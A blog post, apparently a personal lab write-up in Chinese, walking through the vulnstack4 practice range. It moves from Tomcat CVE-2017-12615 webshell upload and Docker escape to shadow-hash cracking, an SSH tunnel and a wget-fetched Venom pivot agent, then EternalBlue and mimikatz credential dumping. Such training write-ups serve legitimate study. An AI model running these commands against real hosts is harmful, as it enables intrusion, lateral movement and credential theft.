<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/gitpict.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css" integrity="sha256-5eIC48iZUHmSlSUz9XtjRyK2mzQkHScZY1WdMaoz74E=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Pisces","darkmode":true,"version":"8.21.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":true,"style":null},"fold":{"enable":true,"height":200},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":true,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="记录下打vulnstack4靶场的过程">
<meta property="og:type" content="article">
<meta property="og:title" content="vulnstack4靶场笔记">
<meta property="og:url" content="http://example.com/2024/12/05/vulnstack4%E9%9D%B6%E5%9C%BA%E7%AC%94%E8%AE%B0/index.html">
<meta property="og:site_name" content="yanxiao">
<meta property="og:description" content="记录下打vulnstack4靶场的过程">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://vulnstack.qiyuanxuetang.net/media/vuln/screenshot/2020/02/10/FE4Ci3pY9P2Asf1.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/1.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/2.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/3.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/5.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/6.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/7.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/8.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/9.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/10.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/11.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/12.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/13.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/14.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/15.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/16.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/17.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/18.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/20.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/21.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/22.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/23.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/24.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/25.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/26.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/27.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/28.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/29.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/30.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/31.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/32.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/33.png">
<meta property="og:image" content="http://example.com/images/vulnstack4/34.png">
<meta property="article:published_time" content="2024-12-05T03:50:48.000Z">
<meta property="article:modified_time" content="2024-12-05T15:14:59.795Z">
<meta property="article:author" content="yanxiao">
<meta property="article:tag" content="渗透">
<meta property="article:tag" content="vulnstack靶场">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://vulnstack.qiyuanxuetang.net/media/vuln/screenshot/2020/02/10/FE4Ci3pY9P2Asf1.png">


<link rel="canonical" href="http://example.com/2024/12/05/vulnstack4%E9%9D%B6%E5%9C%BA%E7%AC%94%E8%AE%B0/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2024/12/05/vulnstack4%E9%9D%B6%E5%9C%BA%E7%AC%94%E8%AE%B0/","path":"2024/12/05/vulnstack4靶场笔记/","title":"vulnstack4靶场笔记"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>vulnstack4靶场笔记 | yanxiao</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">yanxiao</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">一些碎碎念</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜索..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="nav-number">1.</span> <span class="nav-text">环境搭建</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">2.</span> <span class="nav-text">信息收集</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#docker%E9%80%83%E9%80%B8"><span class="nav-number">3.</span> <span class="nav-text">docker逃逸</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%99%BB%E5%BD%95ubuntu"><span class="nav-number">4.</span> <span class="nav-text">登录ubuntu</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7"><span class="nav-number">4.1.</span> <span class="nav-text">创建用户</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BC%AA%E9%80%A0ssh%E5%AF%86%E9%92%A5"><span class="nav-number">4.2.</span> <span class="nav-text">伪造ssh密钥</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4"><span class="nav-number">4.3.</span> <span class="nav-text">密码爆破</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">5.</span> <span class="nav-text">内网信息收集</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%90%8E%E6%B8%97%E9%80%8F"><span class="nav-number">6.</span> <span class="nav-text">后渗透</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#mimikatz%E5%AF%BC%E5%87%BA%E5%87%AD%E6%8D%AE"><span class="nav-number">6.1.</span> <span class="nav-text">mimikatz导出凭据</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#ms14-068%E6%BC%8F%E6%B4%9E"><span class="nav-number">6.2.</span> <span class="nav-text">ms14-068漏洞</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%82%E8%80%83%E5%A4%A7%E4%BD%AC%E7%9A%84%E9%93%BE%E6%8E%A5%EF%BC%9A"><span class="nav-number">7.</span> <span class="nav-text">参考大佬的链接：</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="yanxiao"
      src="/images/touxiang.jpg">
  <p class="site-author-name" itemprop="name">yanxiao</p>
  <div class="site-description" itemprop="description">Just do it!</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">9</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/yanxiao588" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;yanxiao588" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:ilove1949101@163.com" title="E-Mail → mailto:ilove1949101@163.com" rel="noopener me" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2024/12/05/vulnstack4%E9%9D%B6%E5%9C%BA%E7%AC%94%E8%AE%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/touxiang.jpg">
      <meta itemprop="name" content="yanxiao">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="yanxiao">
      <meta itemprop="description" content="Just do it!">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="vulnstack4靶场笔记 | yanxiao">
      <meta itemprop="description" content="记录下打vulnstack4靶场的过程">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          vulnstack4靶场笔记
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2024-12-05 11:50:48 / 修改时间：23:14:59" itemprop="dateCreated datePublished" datetime="2024-12-05T11:50:48+08:00">2024-12-05</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E6%B8%97%E9%80%8F/" itemprop="url" rel="index"><span itemprop="name">渗透</span></a>
        </span>
    </span>

  
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>2.1k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>8 分钟</span>
    </span>
</div>

            <div class="post-description">记录下打vulnstack4靶场的过程</div>
        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h4 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h4><p><img src="http://vulnstack.qiyuanxuetang.net/media/vuln/screenshot/2020/02/10/FE4Ci3pY9P2Asf1.png" alt="img"></p>
<p>我自己搭建的环境情况：</p>
<p>ubuntu网卡:VMnet 3和 VMnet 4</p>
<p>douser网卡:VMnet 4</p>
<p>administrator网卡:VMnet 4</p>
<p>kali(自己的攻击机)网卡：VMnet3</p>
<p>实际上就是kali（攻击机）和Ubuntu的一块网卡一样，douser、administrator和Ubuntu的另外一个网卡一样即可，而且kali不能ping通douser和administrator</p>
<h4 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h4><p>Ubuntu中进入root：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo su</span><br></pre></td></tr></table></figure>

<p><img src="/../images/vulnstack4/1.png"></p>
<p>重启全部容器：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker restart $(docker ps -aq)</span><br></pre></td></tr></table></figure>

<p><img src="/../images/vulnstack4/2.png"></p>
<p>在kali中使用nmap扫描Ubuntu：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap 192.168.157.131</span><br></pre></td></tr></table></figure>

<p><img src="/../images/vulnstack4/3.png"></p>
<p>可以看到开放了22，2001，2002，2003这4个端口，依次对后面3个端口进行渗透，最后发现只有通过2002端口能够渗透成功</p>
<p>访问2002端口，可以看到是Apache Tomcat&#x2F;8.5.19页面：</p>
<p><img src="/../images/vulnstack4/5.png"></p>
<p>使用awvs扫描</p>
<p><img src="/../images/vulnstack4/6.png"></p>
<p>这里使用第一个漏洞（CVE-2017-12615），漏洞的具体利用可以查看 <a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_48201589/article/details/135280190">https://blog.csdn.net/qq_48201589/article/details/135280190</a> </p>
<p>使用burpsuite抓包，上传冰蝎码：</p>
<p><img src="/../images/vulnstack4/7.png"></p>
<p>可以看到状态码是201，而且访问<a target="_blank" rel="noopener" href="http://192.168.157.131:2002/tt.jsp%E5%8F%AF%E4%BB%A5%E7%9C%8B%E5%88%B0%E5%86%B0%E8%9D%8E%E7%A0%81%E4%B8%8A%E4%BC%A0%E6%88%90%E5%8A%9F%EF%BC%9A">http://192.168.157.131:2002/tt.jsp可以看到冰蝎码上传成功：</a></p>
<p><img src="/../images/vulnstack4/8.png"></p>
<p>冰蝎成功连接：</p>
<p><img src="/../images/vulnstack4/9.png"></p>
<p>现在检查是否处于docker环境中，进入冰蝎的‘命令执行’中，执行：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">ls</span> -alh /.dockerenv</span><br></pre></td></tr></table></figure>

<p>发现结果是：</p>
<p><img src="/../images/vulnstack4/10.png"></p>
<p>可以判断目前处于docker环境中，接下来的思路就是进行docker逃逸</p>
<h4 id="docker逃逸"><a href="#docker逃逸" class="headerlink" title="docker逃逸"></a>docker逃逸</h4><p>有关docker逃逸的知识可以参考：<a target="_blank" rel="noopener" href="https://wiki.teamssix.com/cloudnative/docker/container-escape-check.html">容器逃逸方法检测指北 | T Wiki</a></p>
<p>判断当前是否是特权模式，执行命令：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> /proc/self/status | grep -qi <span class="string">&quot;0000003fffffffff&quot;</span> &amp;&amp; <span class="built_in">echo</span> <span class="string">&quot;Is privileged mode&quot;</span> || <span class="built_in">echo</span> <span class="string">&quot;Not privileged mode&quot;</span></span><br></pre></td></tr></table></figure>

<p><img src="/../images/vulnstack4/11.png"></p>
<p>可以看到处于特权模式，因此可以通过挂载磁盘设备来逃逸</p>
<p>先查看要挂载磁盘设备：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fdisk -l</span><br></pre></td></tr></table></figure>

<p><img src="/../images/vulnstack4/12.png"></p>
<p>可发现磁盘有三个分区，sda1是包含Linux文件系统的分区，通常是可挂载的；sda2是扩展分区，sda5是swap分区，用于虚拟内存，这两个分区都是不可挂载的</p>
<p>在根目录下创建一个test文件夹，将sda1挂载到该文件夹下：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">mkdir</span> /test</span><br><span class="line">mount /dev/sda1 /test</span><br></pre></td></tr></table></figure>

<p>查看&#x2F;test 文件夹看看：</p>
<p><img src="/../images/vulnstack4/13.png"></p>
<p>可以看到成功挂载</p>
<h4 id="登录ubuntu"><a href="#登录ubuntu" class="headerlink" title="登录ubuntu"></a>登录ubuntu</h4><h5 id="创建用户"><a href="#创建用户" class="headerlink" title="创建用户"></a>创建用户</h5><p>查看kali中的&#x2F;etc&#x2F;passwd 并找到</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kali:x:1000:1000:kali,,,:/home/kali:/bin/bash</span><br></pre></td></tr></table></figure>

<p>添加到Ubuntu的&#x2F;etc&#x2F;passwd 中（可以在冰蝎的文件管理中直接添加）</p>
<p>查看kali中的&#x2F;etc&#x2F;shadow并找到</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kali:$y$j9T$hAYSTtIb9K7XVvOTfnSl01$Ew7qmWAY34D.2f2t8XbsYwy72sJRAd.JtsC7JeAt3jB:20031:0:99999:7:::</span><br></pre></td></tr></table></figure>

<p>添加到Ubuntu的&#x2F;etc&#x2F;shadow中（可以在冰蝎的文件管理中直接添加）</p>
<p>但是我在实际操作过程中发现行不通（网上有的教程通过这个方法是可以的）（而且如果忘记删除kali添加到Ubuntu 的&#x2F;etc&#x2F;passwd和&#x2F;etc&#x2F;shadow的数据，在下次开机会发现无法正常登录，需要进入单用户模式进行登录，参考文章：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/v5captain/p/13961143.html">Ubuntu 20 按ESC进入单用户模式 single user mode - 船长博客 - 博客园</a>，删除kali添加的数据后就可以正常登录了）,我推测是对密码的加密方式不同导致的。试验过在Ubuntu中创建一个新的用户，并记录下&#x2F;etc&#x2F;passwd 和&#x2F;etc&#x2F;shadow 中对应的数据，然后在Ubuntu中删除了这个用户。将得到的数据在kali的冰蝎中添加到Ubuntu中，是可以成功登录Ubuntu的（登录过程：执行命令<strong>ssh ubuntu@ubuntu的ip</strong> ）</p>
<h5 id="伪造ssh密钥"><a href="#伪造ssh密钥" class="headerlink" title="伪造ssh密钥"></a>伪造ssh密钥</h5><p>这个我在自己操作的过程也是行不通的，原因至今没找到。操作过程如下：</p>
<ul>
<li><p>在kali中使用 <code>ssh-keygen</code> 命令来创建SSH的密钥， <code>-f</code> 参数用于指定生成密钥文件的名称路径，随后系统会提示你输入一个passphrase(密钥短语)，这是一个可选步骤，若添加了可以提高密钥的安全性，若私钥落入他人手中，他们还需要知道密钥短语才能使用该私钥</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh-keygen -f mykey</span><br></pre></td></tr></table></figure>
</li>
<li><p>随后会在当前目录生成私钥和公钥文件，我们需要将公钥(后缀为.pub)放置到目标服务器上，可以使用 <code>wget</code> 命令将公钥上传至目标服务器的 <code>.ssh</code> 目录，并将文件名修改为 <code>authorized_keys</code>，并修改其权限为600</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">wget http://192.168.47.188:8000/mykey.pub</span><br><span class="line"><span class="built_in">mv</span> mykey.pub authorized_keys</span><br><span class="line"><span class="built_in">chmod</span> 600 authorize_keys</span><br></pre></td></tr></table></figure>


</li>
<li><p>随后在kali中使用对应的私钥连接目标主机的ubuntu用户(ip根据实际情况修改为Ubuntu的ip)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh -i mykey ubuntu@192.168.47.186</span><br></pre></td></tr></table></figure>


</li>
<li><p>一些常见问题的解决方法：</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/lisongjia123/article/details/78513244">解决SSH免密登录配置成功后不生效问题_麒麟3.2免密登录不生效-CSDN博客</a></p>
<p><a target="_blank" rel="noopener" href="https://juejin.cn/post/7067816759759208478">解决SSH免密登录配置成功后不生效问题很简单，重点就两步，分布式scp ~&#x2F;.ssh&#x2F;authorized_keys 中 - 掘金</a></p>
</li>
</ul>
<h5 id="密码爆破"><a href="#密码爆破" class="headerlink" title="密码爆破"></a>密码爆破</h5><p>我实际操作是通过这个方法登录到Ubuntu的。进入Ubuntu的&#x2F;etc&#x2F;shadow 中：</p>
<p><img src="/../images/vulnstack4/14.png"></p>
<p>将：**ubuntu:$6$lPBp.Pfx$RjN2ZeXfzjbLK1ukC6t.b09GYRPMTseene6RBkg4kWFEFKKoxJWwzbZhI&#x2F;y9BHMW6hd8dJCNVgUfRjEpdtvB2.:20060:0:99999:7:::**复制保存得到一个文本文件中，使用john破解：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">john pp --wordlist=/home/kali/dictionary/3000个弱口令.txt</span><br></pre></td></tr></table></figure>

<p>这里的–wordlist参数是指定字典，如果不加这个参数则使用john自带的字典。从下面的结果可以看到Ubuntu的密码是root(Ubuntu的原始密码是ubuntu)</p>
<p><img src="/../images/vulnstack4/15.png"></p>
<p>利用得到的密码使用ssh成功登录Ubuntu：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh ubuntu@192.168.157.131</span><br></pre></td></tr></table></figure>

<p><img src="/../images/vulnstack4/16.png"></p>
<h4 id="内网信息收集"><a href="#内网信息收集" class="headerlink" title="内网信息收集"></a>内网信息收集</h4><ol>
<li><p>端口转发：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh -D 8081 ubuntu@192.168.157.131</span><br></pre></td></tr></table></figure>

<p><img src="/../images/vulnstack4/17.png"></p>
<blockquote>
<p>执行这条命令的意思是将经过8081端口流量的都转发到Ubuntu中，这样这些流量就可以到达Ubuntu的内网中了</p>
</blockquote>
</li>
<li><p>修改proxychain4.conf文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/proxychain4.conf</span><br></pre></td></tr></table></figure>

<p>找到最下面，将端口号改为8081：</p>
<p><img src="/../images/vulnstack4/18.png"></p>
</li>
<li><p>nmap扫描</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains4 nmap -sT -sV -Pn -n  192.168.183.0/24</span><br></pre></td></tr></table></figure>

<p>这条命令的效果就类似于在Ubuntu中安装了nmap对192.168.183.0&#x2F;24进行扫描，注意<em><strong>nmap的ping是依据icmp包进行传输的。而proxychains无法代理icmp包。所以nmap + ip地址是无法进行探测的</strong></em></p>
<p>最终可以扫出两台内网靶机的ip地址（192.168.183.133和192.168.183.130）及开放的端口</p>
</li>
</ol>
<h4 id="后渗透"><a href="#后渗透" class="headerlink" title="后渗透"></a>后渗透</h4><p>使用msf进行后渗透，尝试用proxychains4进行代理老是有问题，所有就改用Venom（下载地址：<a target="_blank" rel="noopener" href="https://github.com/Dliv3/Venom">Dliv3&#x2F;Venom: Venom - A Multi-hop Proxy for Penetration Testers</a>）</p>
<p>将客户端发送给Ubuntu：</p>
<blockquote>
<p>在kali的Venom目录下执行命令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 -m http.server 8989</span><br></pre></td></tr></table></figure>

<p><img src="/../images/vulnstack4/20.png"></p>
<p>在Ubuntu中执行wget命令进行下载客户端：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget http://192.168.157.129:8989/agent_linux_x64</span><br></pre></td></tr></table></figure>

<p><img src="/../images/vulnstack4/21.png"></p>
</blockquote>
<p>在kali执行命令，监听5555端口：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./admin_linux_x64 -lport 5555</span><br></pre></td></tr></table></figure>

<p><img src="/../images/vulnstack4/22.png"></p>
<p>在Ubuntu中执行命令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">chmod +x agent_linux_x64 （给客户端执行权限）</span><br><span class="line">./agent_linux_x64 -rhost 192.168.157.129 -rport 5555</span><br></pre></td></tr></table></figure>

<p><img src="/../images/vulnstack4/23.png"></p>
<p>执行完后在kali中查看，可以看到成功连接，进入node 建立一个socks 端口指定为7777</p>
<p><img src="/../images/vulnstack4/24.png"></p>
<p>这样kali和Ubuntu就建立了一个socks5连接</p>
<p>使用<strong>scanner&#x2F;smb&#x2F;smb_ms17_010</strong>模块查看win7这台主机发现存在永恒之蓝漏洞：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">setg proxies socks5:127.0.0.1:7777(setg设置为全局参数)</span><br><span class="line">set rhost 192.168.183.133</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<p><img src="/../images/vulnstack4/25.png"></p>
<p>使用<strong>windows&#x2F;smb&#x2F;ms17_010_eternalblue</strong>模块对win7这台靶机进行攻击：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">set payload windows/x64/meterpreter/bind_tcp</span><br><span class="line">set rhost 192.168.183.133</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<p><img src="/../images/vulnstack4/26.png"></p>
<p><img src="/../images/vulnstack4/27.png"></p>
<p>进入shell，可以看到拿到了system权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">shell</span><br><span class="line">chap 65001 (解决乱码问题)</span><br><span class="line">whoami</span><br></pre></td></tr></table></figure>

<p><img src="/../images/vulnstack4/28.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ipconfig /all</span><br></pre></td></tr></table></figure>

<p><img src="/../images/vulnstack4/29.png"></p>
<p>可以看到所处的域是demo.com，域控ip是192.168.183.130</p>
<h5 id="mimikatz导出凭据"><a href="#mimikatz导出凭据" class="headerlink" title="mimikatz导出凭据"></a>mimikatz导出凭据</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">load kiwi  (加载mimikatz)</span><br><span class="line">creds_all  (列举内存凭据)</span><br></pre></td></tr></table></figure>

<p><img src="/../images/vulnstack4/30.png"></p>
